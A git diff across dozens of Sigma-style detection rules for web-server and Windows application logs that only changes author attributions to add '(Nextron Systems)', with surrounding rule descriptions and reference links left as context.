diff --git a/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml
index 2ee999be1..9a5cedb38 100644
--- a/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml
+++ b/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml
@@ -5,7 +5,7 @@ description: Detects access to a webshell dropped into a keystore folder on the
 references:
 - https://twitter.com/pyn3rd/status/1020620932967223296
 - https://github.com/LandGrey/CVE-2018-2894
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/07/22
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml b/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml
index 54757f7d3..1a8568c09 100644
--- a/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml
+++ b/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole
 references:
 - https://www.exploit-db.com/exploits/47297
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/11/18
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml b/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml
index 097fac95b..298457942 100644
--- a/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml
+++ b/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398
 references:
 - https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/26
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml b/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml
index a4b970a4c..6138c0afa 100644
--- a/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml
+++ b/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
 references:
 - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/02/29
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml b/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml
index decb1121d..9ffc01075 100644
--- a/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml
+++ b/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml
@@ -6,7 +6,7 @@ references:
 - https://isc.sans.edu/diary/26734
 - https://twitter.com/jas502n/status/1321416053050667009?s=20
 - https://twitter.com/sudo_sudoka/status/1323951871078223874
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/11/02
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml b/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml
index 792a0e7a7..9f678d741 100644
--- a/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml
+++ b/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml
@@ -5,7 +5,7 @@ description: Detects exploitation attempts on Cisco ASA FTD systems exploiting C
 references:
 - https://twitter.com/aboul3la/status/1286012324722155525
 - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/07
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml b/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml
index a7bf262ae..8d998368c 100644
--- a/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml
+++ b/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml
@@ -7,7 +7,7 @@ references:
 - https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/
 - https://twitter.com/yorickkoster/status/1279709009151434754
 - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/05
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml b/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml
index 8a93c35a2..aefc67896 100644
--- a/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml
+++ b/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml
@@ -6,7 +6,7 @@ references:
 - https://support.citrix.com/article/CTX276688
 - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/
 - https://dmaasland.github.io/posts/citrix.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/10
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml b/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml
index b8c6455c9..aaf7e81ac 100644
--- a/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml
+++ b/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
 references:
 - https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/22
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml b/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml
index 29a21225e..749cee017 100644
--- a/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml
+++ b/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
 references:
 - https://twitter.com/GossiTheDog/status/1392965209132871683?s=20
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/14
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml b/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml
index 65ddeeaf0..01a627e96 100644
--- a/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml
+++ b/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
 references:
 - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
-author: Florian Roth, Max Altgelt, Christian Burkard
+author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml b/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml
index 5c14fc27a..5c05cd89c 100644
--- a/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml
+++ b/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539
 references:
 - https://us-cert.cisa.gov/ncas/alerts/aa21-259a
-author: Tobias Michalski, Max Altgelt
+author: Tobias Michalski (Nextron Systems), Max Altgelt (Nextron Systems)
 date: 2021/09/20
 modified: 2023/01/02
 logsource:
diff --git a/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml b/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml
index ab367e684..82893f3f6 100644
--- a/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml
+++ b/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml
@@ -5,7 +5,7 @@ description: Detects exploitation attempts of Sitecore Experience Platform Pre-A
 references:
 - https://blog.assetnote.io/2021/11/02/sitecore-rce/
 - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/17
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml b/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml
index 67e18ed66..790b5c738 100644
--- a/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml
+++ b/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml
@@ -5,7 +5,7 @@ description: Detects a successful Grafana path traversal exploitation
 references:
 - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
 - https://github.com/search?q=CVE-2021-43798
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/08
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml b/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml
index 0f16fefb5..7dc6e2147 100644
--- a/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml
+++ b/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml
@@ -9,7 +9,7 @@ references:
 - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
 - https://github.com/YfryTchsGD/Log4jAttackSurface
 - https://twitter.com/shutingrz/status/1469255861394866177?s=21
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/10
 modified: 2022/02/06
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml b/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml
index 578839263..8029272c3 100644
--- a/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml
+++ b/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml
@@ -9,7 +9,7 @@ references:
 - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
 - https://github.com/YfryTchsGD/Log4jAttackSurface
 - https://twitter.com/shutingrz/status/1469255861394866177?s=21
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/10
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml b/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml
index 35f4f2705..bbc7841e2 100644
--- a/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml
+++ b/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml
@@ -7,7 +7,7 @@ description: |
 A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
 references:
 - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/12
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml b/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml
index 67cfa6fba..07506a13f 100644
--- a/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml
+++ b/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
 references:
 - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/12
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml b/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml
index 5505ef6f9..2e2f5db20 100644
--- a/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml
+++ b/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py
 - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html
 - https://github.com/apache/spark/pull/36315/files
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/19
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml b/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml
index 73b02128a..e3e0577f4 100644
--- a/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml
+++ b/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml
@@ -7,7 +7,7 @@ references:
 - https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/
 - https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
 - https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/29
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml b/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml
index 4a0032b0d..889f5d5db 100644
--- a/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml
+++ b/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml
@@ -5,7 +5,7 @@ description: Detects potential exploitation attempts that target the Centos Web
 references:
 - https://seclists.org/fulldisclosure/2023/Jan/1
 - https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/20
 tags:
 - attack.initial_access
diff --git a/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml b/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml
index 59f319041..e820ced6f 100644
--- a/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml
+++ b/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/0xf4n9x/CVE-2022-46169
 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
 - https://github.com/rapid7/metasploit-framework/pull/17407
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/27
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml b/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml
index faafec280..6cb17fe85 100644
--- a/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml
+++ b/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml
@@ -5,7 +5,7 @@ description: Detects exploitation attempts in Exchange server logs as described
 references:
 - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/03
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml b/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml
index 2f5fcd645..9525dab4c 100644
--- a/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml
+++ b/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml
@@ -5,7 +5,7 @@ description: Detects exploitation attempt of the OWASSRF variant targeting excha
 references:
 - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
 - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/22
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml b/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml
index aff464193..c7b1bd402 100644
--- a/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml
+++ b/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml
@@ -6,7 +6,7 @@ references:
 - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
 - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
 - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/22
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_exchange_proxyshell.yml b/rules/web/webserver_generic/web_exchange_proxyshell.yml
index 58aa4ca19..94e39a7b0 100644
--- a/rules/web/webserver_generic/web_exchange_proxyshell.yml
+++ b/rules/web/webserver_generic/web_exchange_proxyshell.yml
@@ -6,7 +6,7 @@ references:
 - https://youtu.be/5mqid-7zp8k?t=2231
 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
 - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
-author: Florian Roth, Rich Warren
+author: Florian Roth (Nextron Systems), Rich Warren
 date: 2021/08/07
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml b/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml
index 0fa8806e5..1b7b6a64b 100644
--- a/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml
+++ b/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml
@@ -6,7 +6,7 @@ references:
 - https://youtu.be/5mqid-7zp8k?t=2231
 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
 - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
-author: Florian Roth, Rich Warren
+author: Florian Roth (Nextron Systems), Rich Warren
 date: 2021/08/09
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_jndi_exploit.yml b/rules/web/webserver_generic/web_jndi_exploit.yml
index ffcacb97e..72ddf0a1d 100644
--- a/rules/web/webserver_generic/web_jndi_exploit.yml
+++ b/rules/web/webserver_generic/web_jndi_exploit.yml
@@ -5,7 +5,7 @@ description: Detects exploitation attempt using the JDNIExploiit Kit
 references:
 - https://github.com/pimps/JNDI-Exploit-Kit
 - https://githubmemory.com/repo/FunctFan/JNDIExploit
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/12
 modified: 2022/12/25
 logsource:
diff --git a/rules/web/webserver_generic/web_nginx_core_dump.yml b/rules/web/webserver_generic/web_nginx_core_dump.yml
index 5e28f1cc6..885da4765 100644
--- a/rules/web/webserver_generic/web_nginx_core_dump.yml
+++ b/rules/web/webserver_generic/web_nginx_core_dump.yml
@@ -5,7 +5,7 @@ description: Detects a core dump of a crashing Nginx worker process, which could
 references:
 - https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps
 - https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/31
 modified: 2022/10/09
 tags:
diff --git a/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml b/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml
index d25aaf46a..dde09001d 100644
--- a/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml
+++ b/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml
@@ -5,7 +5,7 @@ description: Detects access to SUPERNOVA webshell as described in Guidepoint rep
 references:
 - https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/
 - https://www.anquanke.com/post/id/226029
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/12/17
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml b/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml
index 2638e03d9..5fa857611 100644
--- a/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml
+++ b/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects exploitation attempts of the SonicWall Jarrewrite Exploit
 references:
 - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/25
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_ssti_in_access_logs.yml b/rules/web/webserver_generic/web_ssti_in_access_logs.yml
index 92a2447f5..101db7caf 100644
--- a/rules/web/webserver_generic/web_ssti_in_access_logs.yml
+++ b/rules/web/webserver_generic/web_ssti_in_access_logs.yml
@@ -5,7 +5,7 @@ description: Detects SSTI attempts sent via GET requests in access logs
 references:
 - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
 - https://github.com/payloadbox/ssti-payloads
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/14
 logsource:
 category: webserver
diff --git a/rules/web/webserver_generic/web_susp_useragents.yml b/rules/web/webserver_generic/web_susp_useragents.yml
index 61695df9b..31ca5769b 100644
--- a/rules/web/webserver_generic/web_susp_useragents.yml
+++ b/rules/web/webserver_generic/web_susp_useragents.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb
 - https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst
 - https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92
-author: Nasreddine Bencherchali, Tim Shelton
+author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
 date: 2022/07/19
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_susp_windows_path_uri.yml b/rules/web/webserver_generic/web_susp_windows_path_uri.yml
index ea98de552..42391902e 100644
--- a/rules/web/webserver_generic/web_susp_windows_path_uri.yml
+++ b/rules/web/webserver_generic/web_susp_windows_path_uri.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication
 references:
 - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/06
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml b/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml
index 825d9f1fa..e69b49012 100644
--- a/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml
+++ b/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects access to DEWMODE webshell as described in FIREEYE report
 references:
 - https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/22
 modified: 2023/01/02
 tags:
diff --git a/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml b/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml
index cbd30ae64..8d1f2143b 100644
--- a/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml
+++ b/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml
@@ -5,7 +5,7 @@ description: Detects Windows Webshells that use GET requests via access logs
 references:
 - https://bad-jubies.github.io/RCE-NOW-WHAT/
 - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2017/02/19
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/builtin/application/win_audit_cve.yml b/rules/windows/builtin/application/win_audit_cve.yml
index d9afcde3f..6e9573131 100644
--- a/rules/windows/builtin/application/win_audit_cve.yml
+++ b/rules/windows/builtin/application/win_audit_cve.yml
@@ -11,7 +11,7 @@ references:
 - https://twitter.com/FlemmingRiis/status/1217147415482060800
 - https://www.youtube.com/watch?v=ebmW42YYveI # "CVEs in Windows Event Logs? What You Need to Know" by 13Cubed.
 - https://nullsec.us/windows-event-log-audit-cve/
-author: Florian Roth, Zach Mathis
+author: Florian Roth (Nextron Systems), Zach Mathis
 date: 2020/01/15
 modified: 2022/10/22
 tags:
diff --git a/rules/windows/builtin/application/win_av_relevant_match.yml b/rules/windows/builtin/application/win_av_relevant_match.yml
index 1f0e78476..510cc58e9 100644
--- a/rules/windows/builtin/application/win_av_relevant_match.yml
+++ b/rules/windows/builtin/application/win_av_relevant_match.yml
@@ -6,7 +6,7 @@ references:
 - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31
 - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed
 - https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2017/02/19
 modified: 2022/05/12
 tags:
diff --git a/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml b/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml
index 7054e3b6a..12bee966c 100644
--- a/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml
+++ b/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml
@@ -5,7 +5,7 @@ description: Detects potential abuse of ntdsutil to dump ntds.dit database
 references:
 - https://twitter.com/mgreen27/status/1558223256704122882
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/14
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml b/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml
index 579db113e..e50582afe 100644
--- a/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml
+++ b/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml
@@ -5,7 +5,7 @@ description: Detects potential abuse of ntdsutil to dump ntds.dit database to a
 references:
 - https://twitter.com/mgreen27/status/1558223256704122882
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/14
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml b/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml
index fc5d77a72..542e0add5 100644
--- a/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml
+++ b/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects MSI package installation from suspicious locations
 references:
 - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/31
 modified: 2022/10/18
 tags:
diff --git a/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml b/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml
index aab86633d..40591d53e 100644
--- a/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml
+++ b/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
 references:
 - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/13
 tags:
 - attack.persistence
